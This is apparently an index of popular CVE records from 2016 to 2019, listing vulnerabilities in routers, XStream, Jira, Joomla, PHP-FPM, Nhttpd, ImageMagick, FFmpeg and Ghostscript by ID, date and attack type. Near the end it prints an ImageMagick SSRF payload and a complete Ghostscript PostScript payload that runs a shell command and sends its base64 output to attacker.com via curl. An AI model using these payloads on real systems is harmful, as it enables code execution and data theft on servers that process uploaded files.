Popular CVE Records (Part 1)

Routers

CVE-2019-16920 | 20191005 | CVE-2019-16920 poc

java

xstream

CVE-2019-10173 | 20190720 | deserialization

jira

CVE-2019-14994 | 20190919 | url path traversal | /..;/
CVE-2019-11581 | 20190601 | rce | Evernote
CVE-2019-8451 | 20190925 | ssrf | ssrf png

php

joomla 3.4.6 rce | 20191008 | exp

php RCE CVE-2019-11043 | 20191024 | attack tool

Nhttpd

CVE-2019-16278 | 20191015 | url path traversal rce CVE-2019-16278

SSRF

Image / Video converters: ImageMagick: CVE-2016-3718 (fill 'url(http://attacker.com/)') CVE-2016-3718 / FFmpeg: CVE-2017-9993 (gen_xbin_playlist(playlist_location))

postscript

CVE-2016-3714
CVE-2018-16509
CVE-2019-6116
CVE-2016-7976 RCE on PDF upload:

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit